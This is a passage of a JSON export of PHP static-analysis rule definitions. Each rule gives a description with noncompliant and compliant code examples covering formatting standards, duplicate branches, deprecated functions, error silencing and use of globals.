bar($param) {\n if ($param === 42) {\n exit(23);\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n throw new Exception('Value 42 is not expected.');\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002 {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if($thirdThing) { \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n ...\n }\n else { \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n ...\n }\n\n try{ \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n\u2002\u2002 }\n\n analyse( $fruit ) ; \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n for ($i = 0;$i < 10; $i++) { \/\/ Nomcompliant; there should be exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply ,$orange); \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n do_something (); \/\/ Noncompliant; there should not be any space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\nclass ClassB\nextends ParentClass \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n \\Serializable \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n &$arg2, array $arg3 = []) {\n\n $noArgs_longVars = function () use ($longVar1, \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n $foo->bar($longArgument, \/\/ Noncompliant; the arguments in a method call should be correctly indented\n $longerArgument,\n $muchLongerArgument); \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n $closureWithArgsAndVars = function($arg1, $arg2)use ($var1, $var2) { \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n ...\n };\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass; \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n {\u2002\u2002\u2002\u2002 \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if ($thirdThing) { \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n ...\n } else { \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n ...\n }\n\n try { \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n ...\n }\n\n analyse($fruit); \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n for ($i = 0; $i < 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply, $orange); \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n do_something(); \/\/ Compliant; there is no space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n ...\n}\n\nclass ClassB2 extends \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n \\ArrayAccess, \/\/ Compliant; the list of implemented interfaces is correctly indented\n \\Countable,\n \\Serializable\n{\n \/* Argument lists may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line. Also, when the argument list is\n * split across multiple lines, the closing parenthesis and opening brace should be\n * placed together on their own line with one space between them.\n *\/\n public function aVeryLongMethodName(\n ClassTypeHint $arg1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n &$arg2,\n array $arg3 = []\n ) {\n $noArgs_longVars = function () use (\n $longVar1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n\n \/* Argument lists may be split across multiple lines, where each subsequent line is\n * indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line.\n *\/\n $foo->bar(\n $longArgument, \/\/ Compliant; the arguments in the method call are be correctly indented\n $longerArgument,\n $muchLongerArgument\n ); \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n \/* Closures should be declared with a space after the \"function\" keyword,\n * and a space before and after the \"use\" keyword.\n *\/\n $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n ...\n };\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, "extends" and "implements" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closures declaration should be correctly spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":""namespace" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after "as" keyword and "=>" operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next "else", "catch" and "finally" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":""use" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each ";" in "for" statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":""use" declarations should be placed after "namespace" declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x < 0) {\n new foo; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x < 0) {\n $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 1) \/\/ Noncompliant\n moveWindowToTheBackground();\n\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n case 1: \/\/ Noncompliant\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 3)\n moveWindowToTheBackground();\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\nvar b = a ? 12 > 4 : 4; \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n case 3:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif (($a >= 0 && $a < 10) || ($a >= 20 && $a < 50)) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n\ndoOneMoreThing();\n\nb = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doTheRest();\n}\n\nint b = a ? 12 > 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n$name = \"George\";\n?>\n<p> Hello <?php echo $name ?>!<\/p>\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... And as of PHP 5.4.0, call-time pass-by-reference\n was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&$name); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code><?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest<?php \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n<?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Deprecated<\/th>\n <th>Use Instead<\/th>\n <\/tr>\n <tr>\n <td><code>call_user_method()<\/code><\/td>\n <td><code>call_user_func()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>call_user_method_array()<\/code><\/td>\n <td><code>call_user_func_array()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>define_syslog_variables()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>dl()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>ereg()<\/code><\/td>\n <td><code>preg_match()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ereg_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n <\/tr>\n <tr>\n <td><code>eregi()<\/code><\/td>\n <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>eregi_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>session_register()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_unregister()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_is_registered()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>set_socket_blocking()<\/code><\/td>\n <td><code>stream_set_blocking()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>split()<\/code><\/td>\n <td><code>preg_split()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>spliti()<\/code><\/td>\n <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>sql_regcase()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_db_query()<\/code><\/td>\n <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_escape_string()<\/code><\/td>\n <td><code>mysql_real_escape_string()<\/code><\/td>\n <\/tr>\n <tr>\n <td>Passing locale category names as strings<\/td>\n <td>Use the LC_* family of constants<\/td>\n <\/tr>\n <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password); \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php'; \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php'; \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n function f_inner () {\n function f_inner_inner() {\n function f_inner_inner_inner() { \/\/ Noncompliant\n }\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\"; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n <li> You run the risk of name clashes. <\/li>\n <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. <\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) { \/\/ Noncompliant\n \/\/...\n}\n\nclass MyClass {\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass MyClass {\n\n public static $name = \"Bob\"; \/\/ Compliant\n\n public static function doSomething($arg) { \/\/ Compliant\n \/\/...\n }\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&&<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&&<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money; \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time && $have_money; \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n global $myGlobalVariable; \/\/ Noncompliant\n $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo(){\n if ($this->name != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo($nameParam){\n if ($nameParam != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n <li> generating output <\/li>\n <li> modifying <code>ini<\/code> settings <\/li>\n <li> emitting errors or exceptions <\/li>\n <li> modifying global or static variables <\/li>\n <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nprint \"Include worked!\";\n\nclass foo {\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass foo {\n\n public function log() {\n print \"Include worked!\";\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. <code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n self::getStatus(); \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() { \/\/ Doesn't actually get called\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n static::getStatus(); \/\/ Compliant\n 